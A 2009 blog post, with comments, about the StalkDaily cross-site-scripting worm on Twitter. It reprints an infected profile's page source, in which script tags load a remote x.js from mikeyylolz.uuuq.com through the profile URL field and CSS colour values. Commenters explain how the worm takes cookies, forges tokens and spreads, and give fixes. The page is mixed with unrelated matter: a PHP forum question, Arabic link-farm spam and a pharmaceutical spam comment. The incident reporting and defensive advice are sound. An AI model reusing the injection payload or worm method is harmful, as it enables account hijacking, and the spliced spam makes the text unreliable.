A Twitter virus has shown up. Tweetstreams, including mine, send out the message:
Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :)
(Of course, the URL link is live in the original.)
Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.
Nobody seems to know yet exactly what is going on. http://twittercism.com/howto-remove-stalkdaily/ is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."
Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.
I'll try to get more information here, in the main post or comment thread, when I can.
Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.
Edit: @pilot suggests disabling scripts via NoScript in FireFox. But this has painful side effects.
Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.
Specifically, there's a profile broken in a way I haven't seen before, looking like:
View Source right now gives:
<DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" /><meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="http://assets1.twitter.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://assets1.twitter.com/images/twitter_57.png" rel="apple-touch-icon" />
<script type="text/javascript">
//<![CDATA[
var page = {};
//]]>
</script>
<link href="http://assets3.twitter.com/stylesheets/screen.css?1239469830" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="http://assets3.twitter.com/stylesheets/master.css?1239469826" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url(http://static.twitter.com/images/themes/theme1/bg.gif) fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
}
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
}
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
background-image:url('http://static.twitter.com/images/pale.png');
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
}
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
}
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side div.user_icon a:hover {
color: #0084B4;
}
#side .stats {
border-top: 1px solid #BDDCAD;
}
#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .stats a:hover span.stats_count {
color: #0084B4;
}
ul.sidebar-menu li.active a b {
border-left: 5px solid #BDDCAD;
}
ul.sidebar-menu li.active a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side hr {
background: #BDDCAD;
color: #BDDCAD;
}
#side .stats td+td {
border-left: none;
border-right: none;
}
#side div.collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right !important;
width: 155px;
}
#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right !important;
}
/* end custom css */
.content-bubble-arrow { background-image: url(http://static.twitter.com/images/arr2.gif); }
.status-btn input.round-btn { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.status-btn input.round-btn:hover { background-image: url('http://static.twitter.com/images/round-btn-hover.gif'); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.hentry .actions .fav { background-image: url('http://static.twitter.com/images/icon_star_full.gif'); }
.hentry .actions .non-fav { background-image: url('http://static.twitter.com/images/icon_star_empty.gif'); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url('http://static.twitter.com/images/icon_throbber.gif'); }
.hentry .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
body#show .reply, .hentry .actions .reply { background-image: url('http://static.twitter.com/images/icon_reply.gif'); }
.direct_message .actions .reply { background-image: url('http://static.twitter.com/images/icon_direct_reply.gif'); }
.direct_message .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
.notify { background-image: url('http://static.twitter.com/images/girl.gif'); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url('http://static.twitter.com/images/pale.png'); background-color: transparent; }
div#follow-toggle.closed { background-image: url('http://static.twitter.com/images/toggle_closed.gif'); }
div#follow-toggle.opened { background-image: url('http://static.twitter.com/images/toggle_opened.gif'); }
.follow-actions .following { background-image: url('http://static.twitter.com/images/checkmark.gif'); }
.loading { background-image: url('http://static.twitter.com/images/loader.gif'); }
.more { background-image: url('http://static.twitter.com/images/more.gif'); }
.more.loading { background-image: url('http://static.twitter.com/images/ajax.gif'); }
body#show .protected { background-image: url('http://static.twitter.com/images/icon_lock.gif'); }
#side .promotion { background-image: url('http://static.twitter.com/images/pale.png'); }
.rss { background-image: url('http://static.twitter.com/images/rss.gif'); }
.bulletin a.close { background: transparent url('http://static.twitter.com/images/close_small.png') no-repeat; }
ul.sidebar-menu li.active a { font-weight: bol d; color: #333; background: url('http://static.twitter.com/images/pale.png'); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url('http://static.twitter.com/images/pale.png'); }
#sidebar_search_submit { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -25px !important; }
#sidebar_search_submit:active { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('http://static.twitter.com/images/ajax.gif') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('http://static.twitter.com/images/ajax.gif') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right;
width: 155px;
}
#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right;
}
</style>
</head>
<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href="http://m.twitter.com/">m.twitter.com</a>!</li><li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>
</ul>
<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="http://assets0.twitter.com/images/loader.gif" /></span>
<h1 id="header"><a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="Twitter.com" height="36" src="http://assets0.twitter.com/images/twitter_logo_header.png" transparent_png="true" width="155" />
</a>
</h1>
<div class="content-bubble-arrow"></div>
<table cellspacing="0" class="columns">
<tbody>
<tr>
<td id="content" class="round-left column"><div class="wrapper">
<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="https://s3.amazonaws.com/twitter_production/profile_images/133719611/940a9a0f-6c7c-11dd-8677-0519e018e1cd_bigger.jpg" width="73" /> GangsterBoyHah
</h2>
<div class="clear"></div>
<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="http://assets3.twitter.com/images/padlock_large.gif" /></td>
<td><h1>This person has protected their updates.</h1>
<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
</td></tr></table>
<center>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
</form></center><br />
</div>
</div>
</div>
</td>
<td id="side_base" class="column round-right">
<div id="side">
<div id="profile" class="section">
<span class="section-links">
<img src="http://assets0.twitter.com/images/icon_lock_sidebar.gif" title="This user’s updates are protected."/>
</span>
<address>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li><li><span class="label">Web</span> <a href="http://"><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>
</ul>
</address>
<div class="stats">
<table>
<tr>
<td>
<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>
</a>
</td>
<td>
<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>
</a>
</td>
<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>
</a></td>
</tr>
</table>
</div>
</div>
<ul id="tabMenu">
<li>
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>
</ul>
<div class="section last">
<h1>Actions</h1>
<ul>
<li>
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah
</li>
<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah
</ul>
</div>
<div id="people" class="section last">
<h1>Following</h1>
<div id="following_list">
<span class="vcard">
<a href="https://twitter.com/Noword" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/54123748/pepsiman_mini.jpg" width="24" /></a>
</span>
<span class="vcard">
<a href="https://twitter.com/soychicka" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/111024484/blythie_mini.jpg" width="24" /></a>
</span>
<span class="vcard">
<a href="https://twitter.com/SWAGGRITE" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/131191695/Picture_025_mini.jpg" width="24" /></a>
</span>
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>
<ul>
<li class="first">© 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="http://blog.twitter.com">Blog</a></li>
<li><a href="http://status.twitter.com">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="http://apiwiki.twitter.com/">API</a></li>
<li><a href="http://search.twitter.com">Search</a></li>
<li><a href="http://help.twitter.com">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>
</ul>
</div>
<hr />
<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="http://twitter.com/home" accesskey="h" id="home_link">Home</a></li>
<li><a href="http://twitter.com/CurtMonash" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="http://twitter.com/invitations/find_on_twitter" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="http://help.twitter.com" accesskey="?" id="help_link">Help</a></li>
<li class="last">
<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>
</li>
<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />
</form>
</ul>
</div>
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script><script src="http://assets2.twitter.com/javascripts/application.js?1239469782" type="text/javascript"></script><script src="http://assets3.twitter.com/javascripts/jquery.watermarkinput.js?1239469798" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/notifications.js?1239469800" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/search.js?1239469801" type="text/javascript"></script>
<script src="http://assets1.twitter.com/javascripts/jquery.cookie.js?1239469791" type="text/javascript"></script><script type="text/javascript">
//<![CDATA[
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if (window.top !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
//]]>
</script><script type="text/javascript">
//<![CDATA[
$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();
});
//]]>
</script>
<!-- BEGIN google analytics -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setDomainName("twitter.com");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
pageTracker._initData();
pageTracker._trackPageview('/profile/GangsterBoyHah');
} catch(err) { }
</script>
<!-- END google analytics --><div id="notifications"></div>
</body>
</html>
Edit: A Malwarebytes scan comes up with three instances of malware. One is the Seneka rootkit (ouch!). I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.
Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3
4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)
Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.
Registry Values Infected:
(No malicious items detected)
Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
Folders Infected:
(No malicious items detected)
Files Infected:
(No malicious items detected)
>
Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.
As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.
At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.
Curt Monash is a leading analyst of and strategic advisor to the software industry. Praised by Lawrence J. Ellison for his "unmatched insight into technology and marketplace trends," Curt was the software/services industry's #1 ranked stock analyst while at PaineWebber, Inc., where he served as a First Vice President until 1987. He subsequently co-founded Evernet, Inc., a $40 million networking systems integrator. Since 1990, he has owned and operated Monash Research, an analysis and advisory firm covering software-intensive sectors of the technology industry. In that period he also has been co-founder, president, or chairman of several other technology startups.
Curt has served as a strategic advisor to many well-known firms, including Oracle, Microsoft, SAP, AOL, CA, and Netezza. Curt earned a Ph.D. in mathematics (Game Theory) from Harvard University. He has held faculty positions in mathematics, economics and public policy at Harvard, Yale, and Suffolk universities.
The Leader in Network Knowledge
Another bad Twitter account
TheGoodGuy is not a good guy on Twitter. Just after I clicked in there I sent the StalkDaily messages
..
Having spent more time working on these pages I have noticed 2 things: 1. The question I asked earlier was really very stupid (!) and 2 how logically they have been put togther!
One question though, I have modified the database with other fields etc, and what I have done is on the admin page I have added a link on the users table to go the the userinfo.php page about that user (which works fine).
However, earlier I had modified that page (userinfo) so that anyone other than the user whos details they were could not access the page (see code). Is there anyway to change the IF statment to IF(session username OR admin)???
Thanks, Jamie
<?php
<?
/* Requested Username error checking */
$req_user = trim($_GET['user']);
if(!$req_user || strlen($req_user) == 0 ||
!eregi("^([0-9a-z])+$", $req_user) ||
!$database->usernameTaken($req_user)){
die("Username not registered");
}
/* Logged in user viewing own account */
if(strcmp($session->username,$req_user) == 0){
echo "My Account";
}
/* Visitor not viewing own account */
else{
echo "You are not authorised to view this information";
}
/* Display requested user information */
$req_user_info = $database->getUserInfo($req_user);
/* Usename */
if(strcmp($session->username,$req_user) == 0){
echo "Username: ".$req_user_info['username']."
";
echo "Email: ".$req_user_info['email']."
";
echo "Title: ".$req_user_info['title']."
";
echo "Forename: ".$req_user_info['forename']."
";
echo "Surname: ".$req_user_info['surname']."
";
echo "Address 1: ".$req_user_info['address1']."
";
echo "Address 2: ".$req_user_info['address2']."
";
echo "City: ".$req_user_info['city']."
";
echo "County: ".$req_user_info['county']."
";
echo "Postcode: ".$req_user_info['postcode']."
";
echo "Phone number: ".$req_user_info['telephone']."
";
echo "Mobile number: ".$req_user_info['mobilephone']."
";
}
?>
شات|دردشة
كتابية|العاب|2|1|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|31|30|32|33|a1|شات
الرياض|
دردشة صوتية|العاب
بنات|العاب باربي|العاب
مغامرات|العاب سباق دراجات|العاب
ذكاء|العاب متنوعة|العاب
قص الشعر|العاب تلبيس|العاب
تلوين-|العاب ديكور|العاب
مطاردات سريعة|العاب رياضية|العاب
تلبيس عرايس|العاب طبخ|العاب حرب|العاب قتال|العاب
افلام كرتون|العاب مكياج|العاب
سباق سيارات|العاب ورق|العاب
اطفال|منتديات|مركز
تحميل الصور|ارشيف|الارشيف|بنات ستايل|منتديات
بنات ستايل|ارشيف بنات|business
directory|business|health|xml|map|بنات ستايل-|منتدى
بنات|توبيكات
بنات|العاب بنات|ارشيف
بنات|منتديات فتيات|منتدى
عام|نقاش جاد|نكت
وطرائف|سياحة وسفر|موضة|اكسسوارات|مكياج|فساتين
سهرة|تسريحات|البشرة|ديكور|عالم
حواء|اطباق رئيسيه|شات بنات|شات سعودي|حلويات
و معجنات|سلطات|روايات
ادبية|همس القوافي|قصص|اشعار-|منتديات
طبية|عيادات نفسية-|منتديات
الامومة و الطفولة|منتديات
الصور|مسجات بنات
ستايل|ثيمات جوالات|برامج
كمبيوتر و جوال|اخبار
الفنانين|منتديات اسلامية|اناشيد|منتديات
عامة|سياحة وسفر|صور|مسلسلات|انمي|اخبار
الفن|افلام|افلام
اجنبية|خواطر|روايات|شعر|قصص|امثال|صور
سيارات|مصارعة|نكت|تحميل
العاب|برامج|توبيكات|كتب-|برامج
جوال|مقاطع فيديو|مسجات|نغمات
mp3|ثيمات|فوتوشوب|ازياء|ديكور|حلويات|الطب البديل|قصص|شات
بنات السعودية|عمرو خالد|نانسي عجرم|ياسر القحطاني|نغمات نوكيا|بنات عوانس|شات كويتي|هيفاء وهبي|ناصر الفراعنة|a2|a3|a4|a5|q6|a6|a7|a8|a9|b1|b2|b3|b4|b5|b6|b7|b8|b9|c1|c2|c3
We will always have such
We will always have such people how making so bad things here....
___________
sildenafil blog
Nasty Stalkdaily
I think I got infected by visiting the profile page of someone else who was infected. I changed my password and logged out of twitter, but when I tried to log back in, got the message that I was locked out of my account because of multiple failed attempts to log in. Very annoying!
Kurt, what the virus is
Kurt, what the virus is doing is executing an XSS http://en.wikipedia.org/wiki/Cross-site_scripting hack whereby the following steps are reproduced:
1) A user visits an "infected" profile i.e. one that has tweeted the update message AND has a modified site URL, and after 3250ms an AJAX request is made which extracts a username and Twitter cookie.
2) The cookie and username are used to generate a valid Twitter authentication token which allows the script to then perform any of the Twitter API functions.
3) Currently, the functions can be found here: http://mikeyylolz.uuuq.com/x.js which include updating a user's status and updating their profile URL. This is where the virus spreads.
4) By adding itself to a user's profile URL, anyone who visits that profile (and does not exit within 3250ms) will be infected if the cookie and username are found.
What this means for Twitter. 1) They do not securely store user information via cookies and 2) They are open to XSS attacks whereby ANY JavaScript can be added to a user's profile without them knowing.
This is only the beginning if they do not plug these holes. Anyone more malicious could have brought Twitter down today, or at least caused a lot more destruction.
Mark -- thanks for the updates!
Mark,
Great work! Please keep it coming!
CAM
Kurt, the fix: 1) Go
Kurt, the fix:
1) Go immediately to http://twitter.com/account/settings and make sure your URL is your own. If it is set to StalkDaily then make sure you highlight the FULL URL field and delete it. Then, input your own URL again.
2) I'd recommend you change your password, but I don't think this is essential.
To prevent being re-infected, if you go to a Twitter profile which has the StalkDaily URL, get off it! You have about 3 seconds to react, so be quick. I'm not joking, the script waits 3 seconds before executing.
Kurt, tried to replicate the
Kurt, tried to replicate the "virus" locally and found that the only way it will execute is via a logged-in user's profile i.e. it in no way accesses your password details. It uses a cookie and authentication token generated (and posted publically) by Twitter to perform API actions. To perform these actions you need *both* components, and so cannot extract authentication tokens without also having login details.
This potentially rules out any server-side exploit without having username and password credentials. However, this "virus" uses client-side scripting which takes advantages of vulnerabilites only Twitter can fix.
The best thing you can do is make sure your URL is as it should be, and that you stay away from profiles with rogue URLS. Otherwise, you should all be fine. Phew.
Stalker virus
On the gangsterboyhah profile, look at the source.
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
The script is hidden in the color
small, small world
I follow a guy who got hit with the SD virus who posted a link to your blog, Curt...and here I am walking down memory lane. ;-)
Glad to have run into you again, Curt...even it it was through a link from a guy who'd gotten hit with a virus.
Post new comment